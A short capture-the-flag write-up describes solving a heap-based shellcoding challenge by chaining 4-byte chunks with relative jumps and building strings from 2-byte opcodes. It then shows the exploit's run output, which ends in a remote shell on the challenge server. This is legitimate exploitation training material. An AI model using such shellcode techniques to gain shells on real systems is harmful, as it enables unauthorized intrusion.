Simple shellcoding challenge from a Raytheon SI hiring/meet-greet/CTF event.
Basically, you provide data four bytes at a time. This is stored in an 8-byte allocation. The second 4 bytes of the allocation are a pointer to the next allocation.
The challenge is less difficult than it first appears. Looking at the x86 opcodes, there's no way to do a direct JMP or CALL. However, because of the heap layout, you can just do 'jmp $+offset'.
The remaining difficulty is then doing stuff with 2-byte opcodes. I chose to rewrite the pwntools* pushstr
method to do it with just 2-byte opcodes by INC
ing and SHIFT
ing and PUSH
ing eax
.
python push.py
[+] Opening connection to 107.170.0.195 on port 15232: Done
[+] Recieving all data: Done
[*] Switching to interactive mode
$ id
uid=1001(ll) gid=1001(ll) groups=1001(ll)